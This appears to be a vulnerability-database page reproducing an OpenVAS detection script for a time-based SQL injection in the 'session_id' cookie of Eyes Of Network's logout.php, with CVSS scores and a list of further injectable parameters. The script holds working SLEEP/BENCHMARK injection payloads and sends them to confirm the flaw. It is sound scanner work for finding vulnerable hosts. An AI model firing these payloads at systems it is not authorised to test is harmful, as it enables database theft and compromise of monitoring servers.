Lucene search

K
openvasCopyright (C) 2017 Greenbone Networks GmbHOPENVAS:1361412562310108174
HistoryJun 07, 2017 - 12:00 a.m.

Eyes Of Network (EON) 'logout.php' SQL Injection Vulnerability

2017-06-0700:00:00
Copyright (C) 2017 Greenbone Networks GmbH
plugins.openvas.org
38

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.4

Confidence

High

EPSS

0.005

Percentile

76.7%

Eyes Of Network (EON) is prone to a sql injection vulnerability.

# Copyright (C) 2017 Greenbone Networks GmbH
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

CPE = "cpe:/a:eyes_of_network:eyes_of_network";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.108174");
  script_version("2023-11-03T05:05:46+0000");
  script_cve_id("CVE-2017-1000060", "CVE-2017-14252", "CVE-2017-14247", "CVE-2017-14404",
                "CVE-2017-14405", "CVE-2017-14402", "CVE-2017-14403", "CVE-2017-14401");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2023-11-03 05:05:46 +0000 (Fri, 03 Nov 2023)");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2021-02-25 19:12:00 +0000 (Thu, 25 Feb 2021)");
  script_tag(name:"creation_date", value:"2017-06-07 09:31:19 +0200 (Wed, 07 Jun 2017)");
  script_name("Eyes Of Network (EON) 'logout.php' SQL Injection Vulnerability");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("gb_eyesofnetwork_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("eyesofnetwork/http/detected");

  script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/41774/");
  script_xref(name:"URL", value:"https://rioru.github.io/pentest/web/2017/03/28/from-unauthenticated-to-root-supervision.html");

  script_tag(name:"summary", value:"Eyes Of Network (EON) is prone to a sql injection vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
  check the response time. If the time based check fails also check the version.");

  script_tag(name:"insight", value:"Multiple flaws exist as,

  - The vulnerability is a time-based SQL injection that can be exploited by
    un-authenticated users via an HTTP GET request and affects the logout.php
    and the cookie parameter 'session_id'.

  - Input passed via 'group_id' cookie to side.php script, 'user_id' cookie to
    header.php script, 'tool_list' parameter to module/tool_all/select_tool.php
    script, 'hosts_cacti' array parameter to module/admin_device/index.php script,
    'user_name' parameter to module/admin_user/add_modify_user.php script, 'term'
    parameter to module/admin_group/search.php script and 'user_name' parameter to
    module/admin_user/add_modify_user.php script is not sufficiently validated.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to e.g dump database data out to a malicious server, using an
  out-of-band technique, such as select_loadfile(), conduct SQL Injection
  attacks and execute arbitrary commands on affected system.");

  script_tag(name:"affected", value:"Eyes Of Network (EON) versions 5.1 and
  below are vulnerable.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the
  disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to
  upgrade to a newer release, disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"solution_type", value:"WillNotFix");
  script_tag(name:"qod_type", value:"remote_app");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");
include("misc_func.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) )
  exit( 0 );

ver = infos["version"];
dir = infos["location"];
vt_strings = get_vt_strings();

if( dir == "/" ) dir = "";

url = dir + "/logout.php";

# Chose sleep method, from my tests this is required by different versions of the application
if( version_is_greater_equal( version:ver, test_version:"5.1" ) ) {
  cookie1 = "session_id=" + vt_strings["lowercase"] + "' OR BENCHMARK(";
  cookie2 = "00000000,1)=1 -- -";
  latency += 1;
} else {
  cookie1 = "session_id=" + vt_strings["lowercase"] + "' OR SLEEP(";
  cookie2 = ")=1 -- -";
}

cookie = cookie1 + 0 + cookie2;

# Latency check
req = http_get_req( url:url, port:port, accept_header:"text/html, text/xml", add_headers:make_array( "Cookie", cookie ) );
start = unixtime();
http_keepalive_send_recv( port:port, data:req );
stop = unixtime();
latency = stop - start;
count = 0;

foreach sleep( make_list( 1, 3, 5 ) ) {

  cookie = cookie1 + sleep + cookie2;

  req = http_get_req( url:url, port:port, accept_header:"text/html, text/xml", add_headers:make_array( "Cookie", cookie ) );
  start = unixtime();
  res = http_keepalive_send_recv( port:port, data:req );
  stop = unixtime();
  if( stop - start < sleep || stop - start > ( sleep + 10 + latency ) ) {
    continue;
  } else {
    count += 1;
  }
}

if( count >= 2 ) {
  report = http_report_vuln_url( port:port, url:url ) + ", Cookie used: " + cookie;
  security_message( port:port, data:report );
  exit( 0 );
# Time-based SQLi is currently not that reliable so also report version-based
} else if( version_is_less_equal( version:ver, test_version:"5.1" ) ) {
  report = report_fixed_ver( installed_version:ver, fixed_version:"WillNotFix", install_path:dir );
  security_message( port:port, data:report );
  exit( 0 );
}

exit( 99 );

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.4

Confidence

High

EPSS

0.005

Percentile

76.7%

Related for OPENVAS:1361412562310108174